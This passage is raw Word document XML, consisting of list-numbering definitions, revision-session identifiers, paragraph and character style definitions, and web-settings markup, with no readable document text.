      <w:numFmt w:val="upperRoman"/>
      <w:lvlText w:val="%2."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="994ED90A">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="16D09DF0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="9586E396">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%5."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="A6EC4A32">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%6."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="B288BEAA">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="17649E9A">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%8."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="EB92EBFA">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%9."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="1" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="0BC95BBA"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4E8826F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1D6E4D72"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C4D25568"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>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3" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="1DE10870"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="DD5248A2"/>
    <w:lvl w:ilvl="0" w:tplc="DBE2F9BC">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="32EE5B84">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="35C8B758">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="2EDAAFB0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="96B89A6C">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="86443EC8">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="DA52FE36">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="283277B4">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="B60ED032">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="4" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="351776E2"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="40B82066"/>
    <w:lvl w:ilvl="0" w:tplc="4BCE875E">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="CBAC0994">
      <w:start w:val="1"/>
      <w:numFmt w:val="upperRoman"/>
      <w:lvlText w:val="%2."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="F1D4F076">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="A09CF652">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="2A182FB6">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%5."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="D6EA4B44">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%6."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="DB8C1D44">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="FAB45C0E">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%8."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="1FD81010">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%9."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="5" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="45F4619C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F3D60596"/>
    <w:lvl w:ilvl="0" w:tplc="CAD621BA">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="22C68DE8">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="9C748304">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="ACB8B144">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="1E38BD58">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="88B63064">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="F13ADE7C">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="E0F49A18">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="37AC13DE">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="6" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="4A2F37EC"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="203E551E"/>
    <w:lvl w:ilvl="0" w:tplc="D44880DC">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="E1D09F0A">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="E072263E">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="62E45102">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="384AF8B4">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%5."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="B0D0B970">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%6."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="8AECEFE6">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="EC80ADB8">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%8."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="225CABAE">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%9."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="7" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="4D190080"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="AF3655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4"/>
  </w:num>
  <w:num w:numId="3">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="4">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="5">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="6">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="7">
    <w:abstractNumId w:val="2"/>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BFC4C3"/>
    <w:rsid w:val="00006ED8"/>
    <w:rsid w:val="000157DB"/>
    <w:rsid w:val="000209CC"/>
    <w:rsid w:val="00025048"/>
    <w:rsid w:val="00030AA8"/>
    <w:rsid w:val="00033E3C"/>
    <w:rsid w:val="00062E42"/>
    <w:rsid w:val="000731FD"/>
    <w:rsid w:val="0008057D"/>
    <w:rsid w:val="00081FF2"/>
    <w:rsid w:val="000870DF"/>
    <w:rsid w:val="000D2782"/>
    <w:rsid w:val="000E1624"/>
    <w:rsid w:val="000E2E20"/>
    <w:rsid w:val="00122E21"/>
    <w:rsid w:val="00130082"/>
    <w:rsid w:val="001814EF"/>
    <w:rsid w:val="00183720"/>
    <w:rsid w:val="001A144A"/>
    <w:rsid w:val="001A2800"/>
    <w:rsid w:val="001A2953"/>
    <w:rsid w:val="001C03AF"/>
    <w:rsid w:val="00223171"/>
    <w:rsid w:val="002273F3"/>
    <w:rsid w:val="00234880"/>
    <w:rsid w:val="00243FE9"/>
    <w:rsid w:val="00254830"/>
    <w:rsid w:val="0027242F"/>
    <w:rsid w:val="002B704E"/>
    <w:rsid w:val="003019A6"/>
    <w:rsid w:val="00304D84"/>
    <w:rsid w:val="00317BAC"/>
    <w:rsid w:val="00323110"/>
    <w:rsid w:val="003423BF"/>
    <w:rsid w:val="00342829"/>
    <w:rsid w:val="00390CF1"/>
    <w:rsid w:val="00391678"/>
    <w:rsid w:val="003A5722"/>
    <w:rsid w:val="003B34E4"/>
    <w:rsid w:val="003B4513"/>
    <w:rsid w:val="00431188"/>
    <w:rsid w:val="004832E0"/>
    <w:rsid w:val="00496DD5"/>
    <w:rsid w:val="004B0285"/>
    <w:rsid w:val="004B03CD"/>
    <w:rsid w:val="004B6307"/>
    <w:rsid w:val="004B6F87"/>
    <w:rsid w:val="004D51D5"/>
    <w:rsid w:val="00504046"/>
    <w:rsid w:val="00521D99"/>
    <w:rsid w:val="005307D1"/>
    <w:rsid w:val="00530FA5"/>
    <w:rsid w:val="00544D95"/>
    <w:rsid w:val="00553A8C"/>
    <w:rsid w:val="005652B5"/>
    <w:rsid w:val="005C7D93"/>
    <w:rsid w:val="005D6687"/>
    <w:rsid w:val="005E0C4F"/>
    <w:rsid w:val="006252AA"/>
    <w:rsid w:val="006258FF"/>
    <w:rsid w:val="00660E4F"/>
    <w:rsid w:val="006864C8"/>
    <w:rsid w:val="006D4DC6"/>
    <w:rsid w:val="00713D15"/>
    <w:rsid w:val="007307C1"/>
    <w:rsid w:val="00744A06"/>
    <w:rsid w:val="00784877"/>
    <w:rsid w:val="007B3C6E"/>
    <w:rsid w:val="007E00B0"/>
    <w:rsid w:val="008004F2"/>
    <w:rsid w:val="008355D1"/>
    <w:rsid w:val="00843360"/>
    <w:rsid w:val="00887AC7"/>
    <w:rsid w:val="0089727B"/>
    <w:rsid w:val="008D0620"/>
    <w:rsid w:val="008E4EF7"/>
    <w:rsid w:val="008F6632"/>
    <w:rsid w:val="00902408"/>
    <w:rsid w:val="0091028B"/>
    <w:rsid w:val="009150E5"/>
    <w:rsid w:val="00951F1B"/>
    <w:rsid w:val="009576B7"/>
    <w:rsid w:val="009724D7"/>
    <w:rsid w:val="00987D17"/>
    <w:rsid w:val="009B142E"/>
    <w:rsid w:val="009C3028"/>
    <w:rsid w:val="009E426E"/>
    <w:rsid w:val="009E5AB7"/>
    <w:rsid w:val="009F2107"/>
    <w:rsid w:val="009F368A"/>
    <w:rsid w:val="009F4DE5"/>
    <w:rsid w:val="00A01ECC"/>
    <w:rsid w:val="00A15B28"/>
    <w:rsid w:val="00A17144"/>
    <w:rsid w:val="00A41E52"/>
    <w:rsid w:val="00A678FF"/>
    <w:rsid w:val="00A87DCA"/>
    <w:rsid w:val="00AB752E"/>
    <w:rsid w:val="00AE3E17"/>
    <w:rsid w:val="00B301D9"/>
    <w:rsid w:val="00B328C5"/>
    <w:rsid w:val="00B332AF"/>
    <w:rsid w:val="00B3482F"/>
    <w:rsid w:val="00B41F1E"/>
    <w:rsid w:val="00B511E3"/>
    <w:rsid w:val="00B52B6C"/>
    <w:rsid w:val="00B66DE9"/>
    <w:rsid w:val="00B7657D"/>
    <w:rsid w:val="00B9013C"/>
    <w:rsid w:val="00B9686F"/>
    <w:rsid w:val="00BA5D59"/>
    <w:rsid w:val="00C008B5"/>
    <w:rsid w:val="00C00F3B"/>
    <w:rsid w:val="00C159CB"/>
    <w:rsid w:val="00C306D9"/>
    <w:rsid w:val="00C32E24"/>
    <w:rsid w:val="00C37157"/>
    <w:rsid w:val="00C371DE"/>
    <w:rsid w:val="00C62CE3"/>
    <w:rsid w:val="00C71E37"/>
    <w:rsid w:val="00C72D9A"/>
    <w:rsid w:val="00C95DEC"/>
    <w:rsid w:val="00C96DDA"/>
    <w:rsid w:val="00CA6354"/>
    <w:rsid w:val="00CB47FF"/>
    <w:rsid w:val="00CD1E1F"/>
    <w:rsid w:val="00CE17E1"/>
    <w:rsid w:val="00CE230A"/>
    <w:rsid w:val="00D079FA"/>
    <w:rsid w:val="00D14346"/>
    <w:rsid w:val="00D15BEB"/>
    <w:rsid w:val="00D2699D"/>
    <w:rsid w:val="00D4575C"/>
    <w:rsid w:val="00D65679"/>
    <w:rsid w:val="00D927D5"/>
    <w:rsid w:val="00D93C32"/>
    <w:rsid w:val="00DA5CC3"/>
    <w:rsid w:val="00DB23E3"/>
    <w:rsid w:val="00DC3158"/>
    <w:rsid w:val="00DF55BE"/>
    <w:rsid w:val="00E05993"/>
    <w:rsid w:val="00E20E39"/>
    <w:rsid w:val="00E37EEA"/>
    <w:rsid w:val="00E404E7"/>
    <w:rsid w:val="00E55058"/>
    <w:rsid w:val="00E71B25"/>
    <w:rsid w:val="00EB5B3F"/>
    <w:rsid w:val="00ED2CEC"/>
    <w:rsid w:val="00EE2B17"/>
    <w:rsid w:val="00F00C40"/>
    <w:rsid w:val="00F02F28"/>
    <w:rsid w:val="00F06F74"/>
    <w:rsid w:val="00F16544"/>
    <w:rsid w:val="00F361B7"/>
    <w:rsid w:val="00F9163A"/>
    <w:rsid w:val="00FB5FB2"/>
    <w:rsid w:val="00FD096B"/>
    <w:rsid w:val="00FE0DD3"/>
    <w:rsid w:val="00FE4D2A"/>
    <w:rsid w:val="00FE6E33"/>
    <w:rsid w:val="00FF21BF"/>
    <w:rsid w:val="00FF3DAD"/>
    <w:rsid w:val="00FF3FD2"/>
    <w:rsid w:val="03AFDCB6"/>
    <w:rsid w:val="03F6C9C5"/>
    <w:rsid w:val="14C6630C"/>
    <w:rsid w:val="19245E81"/>
    <w:rsid w:val="1BB98C13"/>
    <w:rsid w:val="2778AF6C"/>
    <w:rsid w:val="37D95A0E"/>
    <w:rsid w:val="42C0AFAD"/>
    <w:rsid w:val="447318B5"/>
    <w:rsid w:val="44CA0B76"/>
    <w:rsid w:val="494F6FA1"/>
    <w:rsid w:val="4A78B6FA"/>
    <w:rsid w:val="4A9FBBD2"/>
    <w:rsid w:val="4DEB53B7"/>
    <w:rsid w:val="52CD5C31"/>
    <w:rsid w:val="5F701428"/>
    <w:rsid w:val="6732B148"/>
    <w:rsid w:val="6FBFC4C3"/>
    <w:rsid w:val="7300FB8F"/>
    <w:rsid w:val="75F9B857"/>
    <w:rsid w:val="7A011108"/>
    <w:rsid w:val="7C7B4B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FC4C3"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{6CBBF6F3-68F8-4929-BBCF-11701D6B30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17BAC"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="240" w:after="0"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>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eading1Char" w:customStyle="1">
    <w:name w:val="Heading 1 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading1"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00317BAC"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
      <w:lang w:val="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Bibliography">
    <w:name w:val="Bibliography"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="37"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00317BAC"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="li1" w:customStyle="1">
    <w:name w:val="li1"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="00F361B7"/>
    <w:pPr>
      <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      <w:ind w:left="-90"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:lang w:eastAsia="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="li2" w:customStyle="1">
    <w:name w:val="li2"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="00F361B7"/>
    <w:pPr>
      <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      <w:ind w:left="-90"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:lang w:eastAsia="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="sy0" w:customStyle="1">
    <w:name w:val="sy0"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00F361B7"/>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00FE0DD3"/>
    <w:rPr>
      <w:strike w:val="0"/>
      <w:dstrike w:val="0"/>
      <w:color w:val="428BCA"/>
      <w:u w:val="none"/>
      <w:effect w:val="none"/>
      <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00FE0DD3"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Strong">
    <w:name w:val="Strong"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="22"/>
    <w:qFormat/>
    <w:rsid w:val="00ED2CEC"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NormalWeb">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00ED2CEC"/>
    <w:pPr>
      <w:spacing w:before="225" w:after="225" w:line="330" w:lineRule="atLeast"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
      <w:color w:val="666666"/>
      <w:sz w:val="21"/>
      <w:szCs w:val="21"/>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43515">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
